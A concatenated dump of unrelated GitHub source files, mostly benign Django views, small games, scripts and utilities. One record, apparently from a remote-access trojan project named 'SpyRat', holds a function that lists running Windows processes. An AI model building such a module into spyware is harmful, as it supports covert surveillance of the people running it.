Offer.objects.get_weightened()\n return render(request, 'offers/reorder.html', {\n 'offers': offers, 'id': id_})\n\n @staticmethod\n def post(request, _):\n \"\"\"Display offer list with weights GET request.\n\n :param request:\n :param id_: Integer newly created offer id\n :return:\n \"\"\"\n if request.POST.get('submit') == 'reorder':\n items = [item\n for item\n in request.POST.items()\n if item[0].startswith('weight_')]\n weights = {id_.split('_')[1]: weight\n for id_, weight in items}\n for id_, weight in weights.items():\n Offer.objects.filter(id=id_).update(weight=weight)\n\n messages.success(\n request,\n \"Uporządkowano oferty.\"\n )\n return redirect('offers_list')\n\n\nclass OffersAccept(View):\n \"\"\" Class view responsible for acceptance of offers \"\"\"\n\n @staticmethod\n def get(request, pk): # pylint: disable=invalid-name\n \"\"\"Method which allows to delete selected offer\n\n :param request: WSGIRequest instance\n :param pk: Offer id\n \"\"\"\n offer = get_object_or_404(Offer, pk=pk)\n if (\n request.user.is_authenticated() and\n request.user.userprofile.is_administrator\n ):\n offer.publish()\n messages.info(request, \"Oferta została zaakceptowana.\")\n return redirect(settings.ANGULAR_ROOT)\n\n return HttpResponseForbidden()\n\n\nclass OffersJoin(View):\n \"\"\"Class view supporting joining offer.\"\"\"\n\n @staticmethod\n @correct_slug(Offer, 'offers_join', 'title')\n def get(request, slug, id_): # pylint: disable=unused-argument\n \"\"\"View responsible for showing join form for particular offer.\"\"\"\n if request.user.is_authenticated():\n has_applied = Offer.objects.filter(\n volunteers=request.user,\n volunteers__offer=id_,\n ).count()\n if has_applied:\n messages.error(\n request,\n \"Już wyraziłeś chęć uczestnictwa w tej ofercie.\"\n )\n return redirect('offers_list')\n\n offer = Offer.objects.get(id=id_)\n\n context = {\n 'form': OfferApplyForm(),\n 'offer': offer,\n 'MEDIA_URL': settings.MEDIA_URL,\n }\n\n context['volunteer_user'] = UserProfile()\n if request.user.is_authenticated():\n context['volunteer_user'] = request.user.userprofile\n\n return render(\n request,\n 'offers/offer_apply.html',\n context\n )\n\n @staticmethod\n @correct_slug(Offer, 'offers_join', 'title')\n def post(request, slug, id_): # pylint: disable=unused-argument\n \"\"\"View responsible for saving join for particular offer.\"\"\"\n form = OfferApplyForm(request.POST)\n offer = Offer.objects.get(id=id_)\n if form.is_valid():\n if request.user.is_authenticated():\n user = request.user\n else:\n user = User.objects.filter(\n email=request.POST.get('email')\n ).exists()\n\n if user:\n messages.info(\n request,\n \"Zaloguj się, aby zapisać się do oferty.\"\n )\n return redirect(\n '{ANGULAR_ROOT}/login?next={path}'.format(\n ANGULAR_ROOT=settings.ANGULAR_ROOT,\n path=request.path,\n )\n )\n\n messages.info(\n request,\n \"Zarejestruj się, aby zapisać się do oferty.\"\n )\n return redirect('{ANGULAR_ROOT}/register'.format(\n ANGULAR_ROOT=settings.ANGULAR_ROOT\n ))\n\n has_applied = Offer.objects.filter(\n volunteers=user,\n volunteers__offer=id_,\n ).count()\n if has_applied:\n messages.error(\n request,\n \"Już wyraziłeś chęć uczestnictwa w tej ofercie.\"\n )\n return redirect('offers_list')\n\n offer.volunteers.add(user)\n offer.save()\n send_mail(\n request,\n 'offer_application',\n [\n userprofile.user.email\n for userprofile in offer.organization.userprofiles.all()\n ],\n dict(\n email=request.POST.get('email'),\n phone_no=request.POST.get('phone_no'),\n 
fullname=request.POST.get('fullname'),\n comments=request.POST.get('comments'),\n offer=offer,\n )\n )\n messages.success(\n request,\n \"Zgłoszenie chęci uczestnictwa zostało wysłane.\"\n )\n return redirect(\n '{ANGULAR_ROOT}/offers/{slug}/{id}'.format(\n ANGULAR_ROOT=settings.ANGULAR_ROOT,\n slug=slugify(offer.title),\n id=str(offer.id),\n )\n )\n else:\n errors = \"
\".join(form.errors)\n messages.error(\n request,\n \"Formularz zawiera nieprawidłowe dane\" + errors\n )\n volunteer_user = UserProfile()\n if request.user.is_authenticated():\n volunteer_user = request.user.userprofile\n return render(\n request,\n 'offers/offer_apply.html',\n {\n 'offer': offer,\n 'form': form,\n 'volunteer_user': volunteer_user,\n }\n )\n","repo_name":"CodeForPoznan/volontulo","sub_path":"backend/apps/volontulo/views/offers.py","file_name":"offers.py","file_ext":"py","file_size_in_byte":8365,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"99"} +{"seq_id":"39352937972","text":"import automata_celular as ac\nfrom PIL import Image\n\n### Función auxiliar para pintar matriz en png -----------------\ndef plot_estado(num_rows, num_cols, estado, filename):\n cell_size = 40\n image = Image.new(mode='L', size=(cell_size*num_cols, cell_size*num_rows), color='white')\n \n for i in range(num_rows):\n for j in range(num_cols):\n state = estado[i*num_rows+j]\n color = 0 if state == 1 else 255\n x = j * cell_size\n y = i * cell_size\n for dy in range(cell_size):\n for dx in range(cell_size):\n image.putpixel((x+dx, y+dy), color)\n image.save(filename + \".png\")\n### -------------------------------------------------------------\n\ndef main():\n m = 6\n n = 6\n estado_inicial = [1,0,1,1,0,1,\n 0,0,1,1,0,0,\n 1,0,0,0,0,1,\n 1,0,1,1,0,1,\n 0,0,0,0,0,0,\n 0,1,1,1,1,0]\n mundo = ac.Mundo(m,n,estado_inicial)\n plot_estado(m, n, mundo.estado, \"output/P1A/1A_mundo0\")\n mundo.actualiza()\n plot_estado(m, n, mundo.estado, \"output/P1A/1A_mundo1\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"daviloncio/repositorio1","sub_path":"P1A_EX1.py","file_name":"P1A_EX1.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"70880300164","text":"import pyxel\n\nclass Option:\n def __init__(self, x, y, side, color):\n self.x = x\n self.y = y\n self.side = side\n self.color = color\n\nclass App:\n def __init__(self):\n pyxel.init(256, 256, caption=\"General Store\", fullscreen=True)\n pyxel.image(0).load(0, 0, \"assets/store.jpg\")\n \n pyxel.mouse(True)\n\n self.cart = [[],[]]\n self.cash = 100\n self.option1 = Option(2,200,5,7)\n self.option2 = Option(2,210,5,7)\n self.option3 = Option(2,220,5,7)\n self.option4 = Option(2,230,5,7)\n self.gender = 1\n self.storeText = 0\n self.cartText = 0\n \n # EVERYTHING MUST BE ABOVE THIS LINE\n pyxel.run(self.update, self.draw)\n \n def update(self):\n if pyxel.btnp(pyxel.KEY_Q):\n pyxel.quit()\n if pyxel.btnp(pyxel.KEY_R):\n self.storeText = 0\n self.cartText = 0\n if pyxel.btnp(pyxel.KEY_ENTER):\n self.storeText = 0\n #Transition!!\n if pyxel.btnp(pyxel.MOUSE_LEFT_BUTTON):\n if(pyxel.mouse_x > self.option1.x and pyxel.mouse_x < (self.option1.x + self.option1.side) and pyxel.mouse_y > self.option1.y and pyxel.mouse_y < (self.option1.y + self.option1.side)):\n if(self.storeText == 1):\n self.cash -= 2\n if(\"Maple Syrup\" not in self.cart[0]):\n self.cart[0].append(\"Maple Syrup\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Maple Syrup\")] += 1\n elif(self.storeText == 2):\n self.cash -= 3\n if(\"Mittens\" not in self.cart[0]):\n self.cart[0].append(\"Mittens\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Mittens\")] += 1\n elif(self.storeText == 3):\n self.cash -= 20\n if(\"Fishing Rod\" not in self.cart[0]):\n self.cart[0].append(\"Fishing Rod\")\n 
self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Fishing Rod\")] += 1\n if self.storeText == 0:\n self.storeText = 1\n if(pyxel.mouse_x > self.option2.x and pyxel.mouse_x < (self.option2.x + self.option2.side) and pyxel.mouse_y > self.option2.y and pyxel.mouse_y < (self.option2.y + self.option2.side)):\n if(self.storeText == 1):\n self.cash -= 5\n if(\"Bread\" not in self.cart[0]):\n self.cart[0].append(\"Bread\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Bread\")] += 1\n elif(self.storeText == 2):\n self.cash -= 7\n if(\"Toque\" not in self.cart[0]):\n self.cart[0].append(\"Toque\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Toque\")] += 1\n elif(self.storeText == 3):\n self.cash -= 25\n if(\"Medicine\" not in self.cart[0]):\n self.cart[0].append(\"Medicine\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Medicine\")] += 1\n if self.storeText == 0:\n self.storeText = 3\n if(pyxel.mouse_x > self.option3.x and pyxel.mouse_x < (self.option3.x + self.option3.side) and pyxel.mouse_y > self.option3.y and pyxel.mouse_y < (self.option3.y + self.option3.side)):\n if(self.storeText == 1):\n self.cash -= 10\n if(\"Canned Beans\" not in self.cart[0]):\n self.cart[0].append(\"Canned Beans\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Canned Beans\")] += 1\n elif(self.storeText == 2):\n self.cash -= 12\n if(\"Boots\" not in self.cart[0]):\n self.cart[0].append(\"Boots\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Boots\")] += 1\n elif(self.storeText == 3):\n self.cash -= 30\n if(\"Trap\" not in self.cart[0]):\n self.cart[0].append(\"Trap\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Trap\")] += 1\n if self.storeText == 0:\n self.storeText = 3\n if(pyxel.mouse_x > self.option4.x and pyxel.mouse_x < (self.option4.x + self.option4.side) and pyxel.mouse_y > self.option4.y and pyxel.mouse_y < (self.option4.y + self.option4.side)):\n if(self.storeText == 1):\n self.cash -= 25\n if(\"Canadian Bacon\" not in self.cart[0]):\n self.cart[0].append(\"Canadian Bacon\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Canadian Bacon\")] += 1\n elif(self.storeText == 2):\n self.cash -= 20\n if(\"Coat\" not in self.cart[0]):\n self.cart[0].append(\"Coat\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Coat\")] += 1\n elif(self.storeText == 3):\n self.cash -= 50\n if(\"Tent\" not in self.cart[0]):\n self.cart[0].append(\"Tent\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Tent\")] += 1\n if self.storeText == 0:\n self.cartText = 1\n\n def draw(self):\n # CLEAR SCREEN\n pyxel.cls(0)\n\n # BACKGROUND\n # blt(x, y, img, u, v, w, h, [colkey]) colkey is optional\n pyxel.blt(0, 0, 0, 0, 0, 256, 256)\n\n # DRAW BLACK TEXTBOX\n # rect(x, y, w, h, col)\n pyxel.rect(0, 180, 256, 76, 0)\n\n # TEXT\n if(self.gender == 1):\n self.genderText = \"guy\"\n elif(self.gender == 2):\n self.genderText = \"gal\"\n else:\n self.genderText = \"pal\"\n\n pyxel.text(2, 182, \"\\\"Mornin', what will a young \" + self.genderText + \" like yourself be buying today?\\\" the shopkeeper says gruffly.\", 7)\n\n # OPTIONS\n # One letter - 5x4\n # Where the remaining cash amount will be.s\n pyxel.rect(200, 0, 56, 10, 9)\n pyxel.rectb(200, 0, 56, 10, 0)\n pyxel.text(202, 3, \"Cash:$\" + str(self.cash), 0)\n\n pyxel.rect(self.option1.x, self.option1.y, self.option1.side, self.option1.side, self.option1.color)\n 
pyxel.text(10, self.option1.y, \"Food\", 3)\n pyxel.rect(self.option1.x, self.option2.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option2.y, \"Clothing\", 3)\n pyxel.rect(self.option1.x, self.option3.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option3.y, \"Supplies\", 3)\n pyxel.rect(self.option1.x, self.option4.y, self.option4.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option4.y, \"Check your basket\", 3)\n pyxel.text(2, 250, \"Press Enter to checkout your basket.\", 2)\n\n if(self.storeText == 1):\n pyxel.rect(0, 180, 256, 76, 0)\n pyxel.text(2, 182, \"\\\"This is all the grub I have. Should keep your stomach filled.\\\"\", 7)\n pyxel.rect(self.option1.x, self.option1.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option1.y, \"Maple Syrup - $2\", 2)\n pyxel.rect(self.option1.x, self.option2.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option2.y, \"Bread - $5\", 2)\n pyxel.rect(self.option1.x, self.option3.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option3.y, \"Canned Beans - $10\", 2)\n pyxel.rect(self.option1.x, self.option4.y, self.option4.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option4.y, \"Canadian Bacon - $25\", 2)\n pyxel.text(2, 250, \"Press R to return to General Store - Main.\", 2)\n\n elif(self.storeText == 2):\n pyxel.rect(0, 180, 256, 76, 0)\n pyxel.text(2, 182, \"\\\"Should keep yourselves warm. Gets pretty chilly here in Banff.\\\"\", 7)\n pyxel.rect(self.option1.x, self.option1.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option1.y, \"Mittens - $3\", 2)\n pyxel.rect(self.option1.x, self.option2.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option2.y, \"Toque - $7\", 2)\n pyxel.rect(self.option1.x, self.option3.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option3.y, \"Boots - $12\", 2)\n pyxel.rect(self.option1.x, self.option4.y, self.option4.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option4.y, \"Coat - $20\", 2)\n pyxel.text(2, 250, \"Press R to return to General Store - Main.\", 2)\n\n elif(self.storeText == 3):\n pyxel.rect(0, 180, 256, 76, 0)\n pyxel.text(2, 182, \"\\\"Ahh, you're one of those hiker folk. 
Got quality supplies here.\\\"\", 7)\n pyxel.rect(self.option1.x, self.option1.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option1.y, \"Fishing Rod - $20\", 2)\n pyxel.rect(self.option1.x, self.option2.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option2.y, \"Medicine - $25\", 2)\n pyxel.rect(self.option1.x, self.option3.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option3.y, \"Trap - $30\", 2)\n pyxel.rect(self.option1.x, self.option4.y, self.option4.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option4.y, \"Tent - $50\", 2)\n pyxel.text(2, 250, \"Press R to return to General Store - Main.\", 2)\n\n\n if(self.cartText == 1):\n pyxel.rect(0, 180, 256, 76, 0)\n pyxel.text(2, 182, \"Cart:\", 7)\n tempColumn = 190\n for j in range(len(self.cart[0])):\n pyxel.text(2, tempColumn, str(self.cart[0][j]) + \" - \" + str(self.cart[1][j]), 11)\n tempColumn += 8\n pyxel.text(2, 250, \"Press R to return to General Store - Main.\", 2)\n\nApp()","repo_name":"dengpris/calgaryhacks2021","sub_path":"pyxel-master/pyxel/general_store.py","file_name":"general_store.py","file_ext":"py","file_size_in_byte":11130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7571427257","text":"from .logger import root_logger\nfrom .types.device import Device\nfrom typing import Dict\nfrom threading import Lock\n\n\n\nlogger = root_logger.getChild(__name__.split(\".\", 1)[-1])\n\n\nclass DeviceState:\n online = \"online\"\n offline = \"offline\"\n\n\nclass DeviceManager:\n\n def __init__(self):\n self.__device_pool = dict()\n self.__lock = Lock()\n\n def add(self, device: Device) -> None:\n if not isinstance(device, Device):\n raise TypeError\n self.__lock.acquire()\n if device.id not in self.__device_pool:\n self.__device_pool[device.id] = device\n else:\n logger.warning(\"device '{}' already in pool\".format(device.id))\n self.__lock.release()\n\n def delete(self, device_id: str) -> None:\n if not isinstance(device_id, str):\n raise TypeError\n self.__lock.acquire()\n try:\n del self.__device_pool[device_id]\n except KeyError:\n logger.warning(\"device '{}' does not exist in device pool\".format(device_id))\n self.__lock.release()\n\n def get(self, device_id: str) -> Device:\n if not isinstance(device_id, str):\n raise TypeError\n self.__lock.acquire()\n try:\n device = self.__device_pool[device_id]\n except KeyError:\n logger.error(\"device '{}' not in pool\".format(device_id))\n self.__lock.release()\n raise\n self.__lock.release()\n return device\n\n def clear(self) -> None:\n self.__lock.acquire()\n self.__device_pool.clear()\n self.__lock.release()\n\n @property\n def devices(self) -> Dict[str, Device]:\n self.__lock.acquire()\n devices = self.__device_pool.copy()\n self.__lock.release()\n return devices\n","repo_name":"y-du/senergy-connector","sub_path":"iot/device_manager.py","file_name":"device_manager.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"16369833571","text":"# Import modules\n\nimport subprocess\n\n\n# Gets a list of active processes\n\ndef ProcessList():\n\tCalling = subprocess.Popen('tasklist',\n\t\tshell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).stdout.readlines()\n\tProcess = [Calling[i].decode('cp866', 'ignore').split()[0].split('.exe')[0] for i in 
range(3,len(Calling))]\n\tProcesses = '\\n'.join(Process)\n\treturn Processes","repo_name":"sympact06/SpyRat","sub_path":"Core/Files/Tasklist.py","file_name":"Tasklist.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"21622515867","text":"from django.urls import path, include\nfrom rest_framework import routers\nfrom . import views\n\nrouter = routers.DefaultRouter()\nrouter.register('categories', views.CategoryView)\nrouter.register('books', views.BookView)\nrouter.register('members', views.MemberView)\n\nurlpatterns = [\n path('', include(router.urls))\n]\n","repo_name":"rosenkrans/library-app","sub_path":"library_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"37567926651","text":"def main():\n while True:\n try:\n n = int(input())\n except EOFError:\n break\n x, y = 0, 0\n for _ in range(n):\n arr = input().split()\n m, d = int(arr[0]), int(arr[1])\n if(m == 0): y += d\n if(m == 1): x += d\n if(m == 2): y -= d\n if(m == 3): x -= d\n print(x,y)\nmain()","repo_name":"InfiniteWing/Solves","sub_path":"zerojudge.tw/c314.py","file_name":"c314.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"29623686797","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport matplotlib.pyplot as plt\ndata = np.genfromtxt(\"./data/fishers.txt\", dtype = None, delimiter = \"\\t\") # ファイルか���読み込み\nprint(data)\nnumber = 149\npercent = [0 for i in range(30)]\n\nfor k in range(1, 31):\n counter = 0\n for i in range(number):\n length = [[0 for col in range(2)] for row in range(149)]\n for j in range(number): # 各点との距離をはかり、データの順番とともに配列に入れる\n length1 = data[i][0] - data[j][0]\n length2 = data[i][1] - data[j][1]\n length3 = data[i][2] - data[j][2]\n length4 = data[i][3] - data[j][3]\n length[j][0] = j\n length[j][1] = np.sqrt(length1**2 + length2**2 + length3**2 + length4**2)\n \n length.sort(key = lambda x:x[1]) # 距離の順に並べ替え\n seto = ver = vir = 0\n for n in range(2, k+2): # 近くにあるk個のデータについて、ラベルの数を数える。最も近いのは自分自身なので除外\n p = length[n][0]\n if data[p][4] == b'I. setosa':\n seto += 1\n elif data[p][4] == b'I. versicolor':\n ver += 1\n elif data[p][4] == b'I. virginica':\n vir += 1\n \n if seto >= ver and seto >= vir: # 最大個数のものとi番目のラベルが一致すればcounterを増やす\n if data[i][4] == b'I. setosa':\n counter += 1\n elif ver > seto and ver >= vir:\n if data[i][4] == b'I. versicolor':\n counter += 1\n elif vir > seto and vir > ver:\n if data[i][4] == b'I. 
virginica':\n counter += 1\n\n percent[k-1] = 100*float(counter)/(number-1) # 各iについてcounterを足し、正答率を出す\n\nprint(percent)\n\n# グラフに表示\nxaxis = [i for i in range(1,31)] \nplt.plot(xaxis, percent, color = \"red\")\nplt.title(\"k-NN (k = 1~30)\")\nplt.xlabel(\"k\")\nplt.ylabel(\"rate of correct answer(%)\")\nplt.savefig('./result/knn_result.png')\n# plt.show()\n","repo_name":"shutakahama/Pattern_Recognition_basic","sub_path":"knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"37499151446","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def increasingBST(self, root: TreeNode) -> TreeNode:\n global roots\n roots = root\n global first\n global joiner\n joiner = None\n first = 1\n\n def helper(nde):\n global first\n global roots\n global joiner\n if nde.left:\n helper(nde.left)\n if first:\n roots = nde\n joiner = nde\n first = 0\n else:\n nde.left = None\n joiner.right = nde\n joiner = nde\n if nde.right:\n helper(nde.right)\n\n helper(roots)\n return roots\n","repo_name":"kaivalyakate/Leetcode---Interview-Preparation","sub_path":"dec_leetcode/inorderbst.py","file_name":"inorderbst.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"1341376566","text":"from django.shortcuts import render,redirect\nfrom .models import Edubridge\nfrom .forms import EdubridgeForm\nfrom django.contrib import messages\nfrom django.db.models import Q\n\ndef eform(request):\n form=EdubridgeForm()\n if request.method=='POST':\n form=EdubridgeForm(request.POST,request.FILES)\n if form.is_valid():\n form.save()\n return redirect(\"eall\")\n\n return redirect(\"hello\")\n else:\n form=EdubridgeForm()\n return render(request,\"eform.html\",{\"form\":form})\n\ndef eall(request):\n data=Edubridge.objects.all()\n query=request.GET.get('s')\n print(query)\n if query is not None:\n data=data.filter(Q(learners_name__icontains=query)|\n Q(adress__icontains=query))\n messages.info(request,\"YOUR INFORMATION BASED ON YOUR INPUT\")\n\n return render(request,\"eall.html\",{\"data\":data})\n #data=data.filter(Q(learners_name__icontains=query) |\n # Q(adress__icontains=query)\n #)\n\n\n\n\ndef hello(request):\n return render(request,\"query.html\")# Create your views here.\ndef eformget(request,a):\n a=Edubridge.objects.get(id=a)\n return render(request,\"eformget.html\",{\"a\":a})\ndef eformupdate(request,a):\n a=Edubridge.objects.get(id=a)\n form=EdubridgeForm()\n if request.method=='POST':\n form=EdubridgeForm(request.POST,request.FILES,instance=a)\n if form.is_valid():\n form.save()\n return redirect(\"eall\")\n else:\n return redirect(\"hello\")\n else:\n form=EdubridgeForm()\n return render(request,'eformupdate.html',{'form':form,'a':a})\ndef eformdelete(request,t):\n a=Edubridge.objects.get(id=t)\n a.delete()\n return redirect('eall')\n","repo_name":"aparnatirumalasetti/demat","sub_path":"app6/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7806673133","text":"'''\n\nProblem Statement: Exam Score Analysis and Visualization\nAn exam has been conducted for a class of students. 
The exam data is stored in a CSV file,\ncontaining the student names and their scores. Develop a Python program to analyse the exam\nscores, calculate key statistics, and visualize the data to gain insights into the students'\nperformance.\n\n'''\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndata = pd.read_csv(\"exam_scores.csv\")\nmean_score = data['Score'].mean()\nmedian_score = data['Score'].median()\nstd_dev = data['Score'].std()\n\nprint(f\"Mean Score: {mean_score:.2f}\")\nprint(f\"Median Score: {median_score:.2f}\")\nprint(f\"Standard Deviation: {std_dev:.2f}\")\n\n# Histogram\nplt.hist(data['Score'], bins=10, edgecolor='black')\nplt.title(\"Exam Score Distribution\")\nplt.xlabel(\"Score\")\nplt.ylabel(\"Frequency\")\nplt.show()\n\n# Box plot\nplt.boxplot(data['Score'])\nplt.title(\"Exam Score Distribution\")\nplt.ylabel(\"Score\")\nplt.show()\n\n\n","repo_name":"9147/PythonClassWork","sub_path":"Term work/tw8/tw8.py","file_name":"tw8.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"23842960227","text":"import argparse\nfrom six.moves import map # pylint: disable=redefined-builtin\nfrom . import _util as util\nfrom ..image import Image\n\ndef main(argv=None, parsed=None):\n parser = argparse.ArgumentParser(parents=[util.universal],\n prog='doapi-image',\n description='Manage DigitalOcean droplet'\n ' images')\n cmds = parser.add_subparsers(title='command', dest='cmd')\n\n cmd_show = cmds.add_parser('show', help='List images',\n description='List images')\n showopts = cmd_show.add_mutually_exclusive_group()\n showopts.add_argument('--distribution', action='store_const',\n dest='type', const='distribution',\n help='List distribution images')\n showopts.add_argument('--application', action='store_const',\n dest='type', const='application',\n help='List application images')\n showopts.add_argument('--type',\n help='List all images of the given type'\n ' (usually \"distribution\" or \"application\")')\n showopts.add_argument('--private', action='store_true',\n help=\"List all of the user's private images\")\n cmd_show.add_argument('-M', '--multiple', action='store_true',\n help='Show multiple images with the same ID, slug, or'\n ' name')\n cmd_show.add_argument('image', nargs='*',\n help='ID, slug, or name of an image; omit to list all')\n\n cmd_delete = cmds.add_parser('delete', help='Delete an image',\n description='Delete an image')\n cmd_delete.add_argument('-M', '--multiple', action='store_true',\n help='Delete multiple images with the same ID,'\n ' slug, or name')\n cmd_delete.add_argument('image', nargs='+',\n help='ID, slug, or name of an image')\n\n cmd_update = cmds.add_parser('update', help='Rename an image',\n description='Rename an image')\n cmd_update.add_argument('--unique', action='store_true',\n help='Error if the new name is already in use')\n cmd_update.add_argument('image', help='ID, slug, or name of an image')\n cmd_update.add_argument('name', help='new name for the image')\n\n cmd_transfer = cmds.add_parser('transfer', parents=[util.waitopts],\n help='Transfer images to another region',\n description='Transfer images to another region')\n cmd_transfer.add_argument('-M', '--multiple', action='store_true',\n help='Transfer multiple images with the same ID,'\n ' slug, or name')\n cmd_transfer.add_argument('region',\n help='slug of the region to transfer images to')\n cmd_transfer.add_argument('image', nargs='+',\n help='ID, slug, or name of an 
image')\n\n cmd_convert = cmds.add_parser('convert', parents=[util.waitopts],\n help='Convert images to snapshots',\n description='Convert images to snapshots')\n cmd_convert.add_argument('-M', '--multiple', action='store_true',\n help='Convert multiple images with the same ID,'\n ' slug, or name')\n cmd_convert.add_argument('image', nargs='+',\n help='ID, slug, or name of an image')\n\n util.add_actioncmds(cmds, 'image')\n\n args = parser.parse_args(argv, parsed)\n client, cache = util.mkclient(args)\n\n if args.cmd == 'show':\n if args.type is not None:\n if args.image:\n util.die('--type and image arguments are mutually exclusive')\n util.dump(client.fetch_all_images(type=args.type))\n elif args.private:\n if args.image:\n util.die('--private and image arguments are mutually exclusive')\n util.dump(client.fetch_all_private_images())\n elif args.image:\n util.dump(cache.get_images(args.image, multiple=args.multiple))\n else:\n util.dump(client.fetch_all_images())\n\n elif args.cmd == 'delete':\n imgs = cache.get_images(args.image, multiple=args.multiple)\n for i in imgs:\n i.delete()\n\n elif args.cmd == 'update':\n cache.check_name_dup(\"image\", args.name, args.unique)\n img = cache.get_image(args.image, multiple=False)\n util.dump(img.update_image(args.name))\n\n elif args.cmd == 'transfer':\n imgs = cache.get_images(args.image, multiple=args.multiple)\n acts = (i.transfer(args.region) for i in imgs)\n if args.wait:\n acts = util.catch_timeout(client.wait_actions(acts))\n util.dump(acts)\n\n elif args.cmd == 'convert':\n imgs = cache.get_images(args.image, multiple=args.multiple)\n acts = map(Image.convert, imgs)\n if args.wait:\n acts = util.catch_timeout(client.wait_actions(acts))\n util.dump(acts)\n\n elif args.cmd in ('act', 'actions', 'wait'):\n imgs = cache.get_images(args.image, multiple=args.multiple)\n util.do_actioncmd(args, client, imgs)\n\n else:\n assert False, 'No path defined for command {0!r}'.format(args.cmd)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jwodder/doapi","sub_path":"doapi/cli/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":5602,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"99"} +{"seq_id":"34297505304","text":"# -*- coding: utf-8 -*-\n\"\"\"Module that checks the user-input values make sense for each variable. \n\nCreated on Mon Mar 30 12:36:50 2020\n\n@author: tbeleyur\n\"\"\"\nimport os \n\ndef make_sure_its_positive(value, **kwargs):\n '''\n\n Parameters\n ----------\n value : float/int\n The variable value tobe checked\n variable: str, optional\n Name of the variabel to be checkeds\n\n Raises\n ------\n ValueError\n If the variable value is <0\n\n Returns\n -------\n None.\n\n '''\n variable = kwargs.get('variable', 'this variable')\n if value <0:\n msg = f'The entered value for {variable}: {value} cannot be negative. Check entry.'\n raise ValueError(msg)\n\ndef make_sure_its_negative(value, **kwargs):\n '''\n\n Parameters\n ----------\n value : float/int\n The variable value tobe checked\n variable: str, optional\n Name of the variabel to be checkeds\n\n Raises\n ------\n ValueError\n If the variable value is >0\n\n Returns\n -------\n None.\n\n '''\n variable = kwargs.get('variable', 'this variable')\n if value >0:\n msg = f'The entered value for {variable}: {value} cannot be positive. 
Check entry.'\n raise ValueError(msg)\n\ndef check_preexisting_file(file_name):\n '''\n Raises\n ------\n ValueError : if the target file name already exists in the current directory\n '''\n exists = os.path.exists(file_name)\n\n if exists:\n mesg = 'The file: '+file_name+' already exists- please move it elsewhere or rename it!'\n raise ValueError(mesg)\n","repo_name":"thejasvibr/itsfm","sub_path":"itsfm/sanity_checks.py","file_name":"sanity_checks.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"35233940076","text":"import calendar\ndef number_of_days(year,month):\n \"\"\"\n Write a function that returns the number of calendar days in a given year and month. \n \"\"\"\n assert year>0\n assert type(year)==int\n assert type(month)==int\n assert 1<=month<=12\n days=calendar.monthrange(year,month)[1]\n return days\n\ndef number_of_leap_years(year1,year2):\n \"\"\"\n Write 